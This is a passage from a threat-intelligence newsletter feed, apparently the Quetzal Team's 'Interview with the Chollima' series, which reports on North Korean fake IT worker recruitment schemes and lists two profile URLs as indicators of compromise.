3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He proceeded to explain <strong>his plan</strong>: he has <strong>a company of 10 developers massively taking remote positions</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!h2lm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!h2lm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 424w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 848w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 1272w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!h2lm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png" width="434" height="629.8114478114478" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1724,&quot;width&quot;:1188,&quot;resizeWidth&quot;:434,&quot;bytes&quot;:1259514,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!h2lm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 424w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 848w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 1272w, https://substackcdn.com/image/fetch/$s_!h2lm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7d840404-2ac0-420f-80c6-f3c6f8091e97_1188x1724.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>My colleague would have to <strong>attend job interviews and get an offer</strong>, which would ultimately be filled by one of those 10 &#8220;<strong>ghost developers</strong>&#8221;, getting him <strong>a 35% cut of the final payment</strong> and being able to make <strong>up to $8,000 per month</strong>. </p><p>Just for attending interviews and posing as <strong>Mr Charming</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Yxw8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Yxw8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 424w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 848w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 1272w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Yxw8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png" width="432" height="633.3559322033898" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1730,&quot;width&quot;:1180,&quot;resizeWidth&quot;:432,&quot;bytes&quot;:1288254,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Yxw8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 424w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 848w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 1272w, https://substackcdn.com/image/fetch/$s_!Yxw8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F590e4bc6-f42c-4c05-8f25-f476e3ded596_1180x1730.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Sounds <strong>too good to be true</strong>, right? For me it sounds exactly like a cornered <strong>villain</strong> <strong>explaining his evil plot</strong> just minutes before being defeated.</p><p>Or even better, like a <strong>North Korean agent</strong> explaining the <strong>villainous Famous Chollima international plot</strong> just before going <strong>viral</strong> all over the internet.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!et25!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!et25!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 424w, https://substackcdn.com/image/fetch/$s_!et25!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 848w, https://substackcdn.com/image/fetch/$s_!et25!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 1272w, https://substackcdn.com/image/fetch/$s_!et25!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!et25!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png" width="418" height="621.6751592356688" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:934,&quot;width&quot;:628,&quot;resizeWidth&quot;:418,&quot;bytes&quot;:261566,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!et25!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 424w, https://substackcdn.com/image/fetch/$s_!et25!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 848w, https://substackcdn.com/image/fetch/$s_!et25!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 1272w, https://substackcdn.com/image/fetch/$s_!et25!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fee8c5f6b-c964-478a-b765-2802bf9dd95b_628x934.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So you wanted to be a <em><strong><a href="https://www.crowdstrike.com/adversaries/famous-chollima/">Famous</a></strong></em><a href="https://www.crowdstrike.com/adversaries/famous-chollima/"> Chollima</a>? <strong>Wish granted</strong>. </p><p>You won&#8217;t be remembered as someone who mastered <strong><a href="https://en.wikipedia.org/wiki/Miguel_de_Cervantes">Cervantes</a></strong>&#8217; tongue, but hey, we&#8217;ll get you <strong>a lot of views on LinkedIn</strong>!</p><p><strong>Say hi to your next job!</strong></p><div><hr></div><h2>Lessons Learned</h2><p>If you&#8217;ve been following this series, or even if this is your first time reading it, you&#8217;ll definitely get a sense of <strong>how far this threat goes</strong>.</p><p>If you&#8217;re a <strong>developer</strong>, helping these guys out could earn you a <a href="https://www.reuters.com/legal/government/doj-announces-arrest-indictments-north-korean-it-worker-scheme-2025-06-30/">free metal wrist from the FBI</a>, and <strong>it&#8217;s not worth it</strong>.</p><p>If you own a company, startup, or any organisation actively looking for <strong>software engineers</strong>, be on high alert. Exercise caution, check IDs at the door, and conduct <strong>rigorous</strong> <strong>background</strong> <strong>checks</strong>.</p><p>Also, it pays to <strong>subscribe</strong> to this kind of <strong>newsletter</strong>. <strong>We worry because it&#8217;s our job to</strong> do so, and by publishing this <strong>research</strong>, you can spend more time <strong>building</strong> (doing your job) instead of worrying. </p><p>Some people may think that <strong>threat intelligence</strong> isn&#8217;t a priority, until something hits you and you don&#8217;t know where to start to understand what happened.</p><p>We are the <strong>Quetzal Team</strong>. We put the <em>&#8220;<strong>Famous</strong>&#8221;</em> in <em>&#8220;<strong>Famous</strong> <strong>Chollima</strong>.&#8221;</em> </p><p>Until next time (we know it&#8217;ll happen again).</p><div><hr></div><h2>IOCs</h2><pre><code>URL:https://linkedin.com/in/sebastian-tamayo-pro
URL:https://www.klimbup.com/perfiles/sebastian-tamayo</code></pre><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Zy4f!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Zy4f!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Zy4f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic" width="200" height="200" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:200,&quot;bytes&quot;:73912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178224681?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Zy4f!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!Zy4f!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9287657-283b-4e6e-b0aa-2f51bcd1199e_1280x1280.heic 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima IV]]></title><description><![CDATA[We put the "Famous" in "Famous Chollima"]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima-iv</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima-iv</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Mon, 03 Nov 2025 20:33:15 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!q6hZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Some researchers like collecting <strong>indicators of compromise</strong>; others prefer watching silently and drafting <strong>indicators of activity</strong>, analysing their adversaries' <strong>behaviours</strong> and reactions.</p><p>I'm more in the second group. A threat actor's activity can sometimes yield (or help you infer) interesting information such as their level of <strong>veterancy</strong>. </p><p><strong>Indicators of veterancy</strong> are those that tell you "this man here, it is not his first rodeo". Look at things like staying<em> calm under fire</em>, kind and educated communication (especially during extortions), and overall patience. These are things that separate bunches of <strong>Discord</strong> <strong>SIM</strong> <strong>swappers</strong> from <strong>long-time criminals and APTs</strong>.</p><p>Truth be told, the only way to discover these indicators is by <strong>engaging</strong> with threat actors, and what we learnt from doing so with the <strong>Chollimas</strong> is&#8230; well, <strong>disappointing</strong>  to say the least:</p><ul><li><p><strong>Nervous</strong>: They are natural liars, and <strong>very bad ones</strong>.</p><ul><li><p>They get <strong>nervous</strong> when questioned (like that <strong>kid</strong> the other day <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iii">tweaking</a> live on camera).</p></li><li><p>Their lies <strong>can&#8217;t stand basic questioning</strong>.</p></li><li><p>They <strong>blow up everything when fleeing</strong> (fake profiles, portfolios, their entire digital persona).</p></li></ul></li><li><p><strong>Backup</strong>: If one of them messes up, prepare for a quick follow-up.</p><ul><li><p>Just as we saw in our last interview, a first <strong>candidate</strong> showed up wearing <strong>exaggerated AI filters</strong> and got <strong>rejected</strong>.</p></li><li><p>The v<strong>ery same day</strong>, another one showed up <strong>wearing a lighter filter</strong>.</p></li></ul></li><li><p><strong>One-up: </strong>If the backup plan fails, <strong>prepare to meet a bigger and nastier Chollima</strong>. Someone more experienced, confident enough to seek revenge for what you did to the other <em>pony-heads </em>(lovely little Chollimas). <br>This happened to us thrice:</p><ul><li><p>After the failed <strong><a href="https://phrack.org/issues/71/3">QRLog</a></strong><a href="https://phrack.org/issues/71/3"> </a><strong><a href="https://phrack.org/issues/71/3">outbreak</a></strong>, where they attempted a <strong><a href="https://quetzal.bitso.com/p/docks">follow-up attack a year</a></strong> later with another division using the same tactic and an improved malware.</p></li><li><p>After <strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima">Interview with the Chollima I</a></strong>, they tried to attack me directly again, posing as a recruiter from <strong>Lockheed Martin.</strong></p></li><li><p>After <strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iii">Interview with the Chollima III</a></strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iii"> </a>(yes, just two days ago), they sent a <em><strong>more senior</strong></em><strong> Chollima</strong> to avenge his little <em>pony-heads</em>, whose faces <strong><a href="https://www.linkedin.com/feed/update/urn:li:activity:7389746066100940800/">we made viral all over the internet</a></strong>, including an article for <strong><a href="https://hackread.com/north-korean-hackers-video-ai-filter-fake-job-interview/">HackRead</a></strong>.</p><ul><li><p>And yes, this just happened <strong>less than an hour ago</strong>.</p></li></ul></li></ul></li></ul><p>Dear readers, meet &#8220;<strong>Juli&#225;n Arleby Mu&#241;oz Mendez</strong>&#8221;, Senior Chollima from the <strong>DPRK</strong> who calmly and bluntly decided to take an <strong>interview</strong> with <strong>Sof&#237;a</strong>, our <strong>Talent Acquisition Specialist</strong>, the same one that discovered his little ponies <em>just two days ago</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!q6hZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!q6hZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 424w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 848w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 1272w, https://substackcdn.com/image/fetch/$s_!q6hZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!q6hZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic" width="1456" height="755" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:755,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:150536,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/177918157?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd382b99f-5450-4d2e-90c8-a69ff5f6a89e_2834x1470.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 